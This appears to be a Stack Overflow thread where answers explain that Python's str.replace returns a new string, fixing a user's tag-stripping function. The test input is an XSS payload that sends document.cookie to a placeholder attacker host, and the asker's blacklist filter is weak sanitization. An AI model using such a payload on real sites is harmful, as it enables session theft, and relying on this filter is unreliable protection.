pearbear

Reputation: 1055

Why is my function not working? Trying to replace words in a string

I am trying to replace some keywords in a string. Here is my function:

def clean_code(input):
    input.replace('<script>', " ")
    input.replace('</script>', " ")
    input.replace('<a href>', " ")
    input.replace('</a>', " ")
    input.replace('>', "&gt;")
    input.replace('>', "&lt;")
    return input

and here is my other code and the string:

string1 = "This blog is STUPID! >\n" \
"<script>document.location='http://some_attacker/cookie.cgi?"\
" +document.cookie </script>"


print '\nstring1 cleaned of code' 
print '------------------------'
print clean_code(string1)

My output is as follows, and I'm not sure why nothing has changed:

string1 cleaned of code
------------------------
This blog is STUPID! >
<script>document.location='http://some_attacker/cookie.cgi? +document.cookie </script>

Upvotes: 2

Views: 8940

Answers (4)

Steven Rumbalski

Reputation: 45542

Strings are immutable in Python. input.replace('</a>', " ") does not alter input. You need to assign the result back to input.
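To illustrate the point, here is a minimal sketch (the variable names original, unchanged and cleaned are made up for this example). It shows that calling replace without using its return value leaves the string as it was, while rebinding a name to the result keeps the change:

```python
# Minimal sketch: str.replace returns a new string and leaves the original untouched.
original = "<script>alert(1)</script>"

# The return value is discarded here, so nothing visible happens.
original.replace("<script>", " ")
unchanged = original

# Binding a name to the return value keeps the result; calls can be chained.
cleaned = original.replace("<script>", " ").replace("</script>", " ")
```

After this runs, unchanged still holds the full tag text, and only cleaned has the tags replaced by spaces.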

But really you should use a parser like BeautifulSoup or lxml.

Upvotes: 5

skunkfrukt

Reputation: 1570

str.replace returns a new string that is the result of the substitution, but does not change the original. To keep the result, you have to assign the return value back to the variable, like so:

myString = myString.replace("foo", "bar")

Furthermore, input.replace('<a href>', " ") will only replace the exact substring "<a href>". str.replace does not accept patterns, so to remove actual links use a regular expression (after import re): input = re.sub(r'<a\s[^>]*>', " ", input).
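Pattern matching in Python goes through the re module rather than str.replace. A rough sketch of the idea, where strip_anchor_tags and the sample string are hypothetical names chosen for this example; a regular expression like this is not a robust way to handle arbitrary HTML:

```python
import re

# Hypothetical helper name, not part of the original answer.
def strip_anchor_tags(text):
    # Replace opening <a ...> tags, whatever their attributes, with a space.
    text = re.sub(r'<a\s[^>]*>', ' ', text)
    # Closing tags have a fixed form, so a plain replace is enough.
    return text.replace('</a>', ' ')

sample = 'See <a href="http://example.com">this page</a> now'
result = strip_anchor_tags(sample)
```

Here result keeps the link text but not the tags. Like replace, re.sub returns a new string, so its return value has to be assigned as well.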

Upvotes: 3

Jakob Bowyer

Reputation: 34698

.replace does not mutate the string in place; it returns a new string.

Try this:

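def clean_code(input):
    # Strip the tags first, then escape any remaining angle brackets.
    for old, new in [('<script>', " "), ('</script>', " "), ('<a href>', " "),
                     ('</a>', " "), ('>', "&gt;"), ('<', "&lt;")]:
        # str.replace returns a new string, so rebind the name each time.
        input = input.replace(old, new)
    return input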
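As a quick check, here is a sketch of the same loop run against the string from the question. It assumes the last pair was meant to escape '<' rather than '>' a second time, and it uses text as the parameter name to avoid shadowing the built-in input:

```python
def clean_code(text):
    # Order matters: the tags are removed before the angle brackets are escaped,
    # otherwise '<script>' would be escaped first and never match.
    replacements = [('<script>', " "), ('</script>', " "), ('<a href>', " "),
                    ('</a>', " "), ('>', "&gt;"), ('<', "&lt;")]
    for old, new in replacements:
        text = text.replace(old, new)
    return text

string1 = "This blog is STUPID! >\n" \
          "<script>document.location='http://some_attacker/cookie.cgi?" \
          " +document.cookie </script>"

result = clean_code(string1)
```

With the result assigned back on every pass, the script tags are gone and the stray '>' on the first line comes out as &gt;.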

Upvotes: 3

icecrime

Reputation: 76755

Python strings are immutable, so you have to assign the result of replace back to the variable:

input = input.replace('<script>', " ")
input = ...

See the replace documentation:

Return a copy of string str with all occurrences of substring old replaced by new.

Upvotes: 8
